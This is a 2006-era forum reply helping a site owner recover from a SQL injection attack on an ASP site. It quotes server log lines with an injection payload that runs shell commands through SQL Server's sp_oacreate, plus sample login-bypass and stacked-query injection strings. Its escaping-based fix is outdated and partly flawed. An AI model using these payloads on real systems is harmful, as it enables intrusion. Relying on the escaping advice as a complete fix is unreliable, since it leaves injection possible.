Here are the solutions:
To immediately and temporarily stop the problem block the following IP address using reliable router. I used “Cisco 506e”
If you using an ISP, you may be able to persuade them by explaining them your problem.
The IP addresses are:
58.37.0.0 - 58.37.255.255
These IP’s belong to Shanghai Telecom.
Please make sure by examining your Log files. I had the following script in my log files. Specially look for the external IP address and block those IP’s.
2006-11-12 01:51:06 W3SVC1 WEBSTERS-OLD 192.168.1.110 GET /sicresults.asp siccode=2655';CREATE%20TABLE%20[X_4223](ResultTxt%20nvarchar(1024)%20NULL);use%20master%2 0declare%20@o%20int%20exec%20sp_oacreate%20'wscrip t.shell',@o%20out%20exec%20sp_oamethod%20@o,'run', NULL,'cmd%20/c%20dir%20C:\Inetpub\wwwroot\Javascripts\search.js %20>%204223.tmp',0,true;DROP%20PROCEDURE%20sp_OACr eate--|93|80040e57|[Microsoft][
2006-11-12 01:51:06 W3SVC1 WEBSTERS-OLD 192.168.1.110 GET /sicresults.asp siccode=2655';CREATE%20TABLE%20[X_4223](ResultTxt%20nvarchar(1024)%20NULL);use%20master%2 0declare%20@o%20int%20exec%20sp_oacreate%20'wscrip t.shell',@o%20out%20exec%20sp_oamethod%20@o,'run', NULL,'cmd%20/c%20dir%20C:\Inetpub\wwwroot\Javascripts\search.js %20>%204223.tmp',0,true;DROP%20PROCEDURE%20sp_OACr eate--|93|80040e57|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]String_or_binary_data_would_be_truncated. 80 - 58.37.160.184 HTTP/1.1
This person uses port 80 to attack your website and obviously you cannot block this port. He sends a backdoor Trojan virus and uses your weakness in ASP Script to obtain entry to your SQL server and execute a script . In my case the script was as above copied and pasted from our logfiles.
Permanent solution:
1. Make a new server without ever exposing to Internet provided you are using your own server. I used jump/flash drives to download patches, scripts and database (2GB). Run a virus scan on all computers involved and kill the backdoor agent. I used AVG spy ware, as this program was effective in killing the virus. Make sure to delete all .tmp files before you copy to your new server. Make sure you follow the step #3 . That alone will solve the problem.
2. As soon as you installed the operating system please install antivirus preferably from AVG and a software firewall. The most effective firewall program is BLACKICE as this program disallows / blocks any script more than 200 characters. You can find this program from
BLACKICE PC Protection Firewall Software
3. You should be able to solve this problem even if you use an ISP as below:
SQL Injection
The script uses vulnerability in your own program. This means you have to secure all vulnerabilities and ASP scripts.
SQL Injection is what has happened above. What to do is to look in your scripts for these vulnerabilities. These are not limited to ASP files, they are readily available in PHP, and almost any Server Side script, and any server.
Here’s an example. Lets say this is your SQL Query:
“SELECT * FROM table_name WHERE username=’”.$user.”’ AND pass=’”.$pass.”’
That looks all and good, but the problem is, let’s say the user enters in with this information:
$user = “username”;
$pass = "' OR ''='";
This will allow the user to log on with any password. If you were smart, you could check for the number of rows returned, and make sure there is only 1 row returned. However, this is simply a workaround. In PHP, you would use the function mysql_real_escape_string(). This escapes all single quotes. So $pass would look like this:
$pass= “\’ OR \’\’=\’”
And their SQL Injection attack would be stopped. However, there are other ways. Such as this:
“SELECT * FROM table_name WHERE username=’”.$user.”’ AND id=”.$id.”;”
This way the attacker could enter in something like this:
$id = ‘1; CREATE TABLE whatever ( .. );’
This wouldn’t work in mySQL, because it only supports one statement per db query. However, it can be done with ASP and other db systems, like SQL Server.
This function is the best resolution:
function quote_smart($value)
{
// Stripslashes
if (get_magic_quotes_gpc()) {
$value = stripslashes($value);
}
// Quote if not a number or a numeric string
if (!is_numeric($value)) {
$value = "'" . mysql_real_escape_string($value) . "'";
}
return $value;
}
This way, you’d enter it in like this:
“SELECT * FROM users WHERE username = “.quote_smart($username).” AND pass = “.quote_smart($pass).”;”
This way, the quote_smart function allows for smart quoting, which removes the need for you to manually quote your own variables with single quotes. It determines whether the variable is a number or not, and escapes and quotes is specifically. This will not work for the multiple SQL statements injection, so you can add an else section:
else {
$value = mysql_real_escape_string($value);
}
This is the cause of the problem, and if you do not understand this, ask whoever coded your website. If you use ASP, here’s a good article on SQL injection:
ASP:
4GuysFromRolla.com - Protecting Yourself from SQL Injection Attacks
PHP mysql_real_escape_string:
PHP: mysql_real_escape_string - Manual
Those should help you stop this attack. You will need to change all of your scripts in question.
This will definitely solve this problem.
Please leave a thank you note for me!
Re: Page being hijacked!
Linear Mode
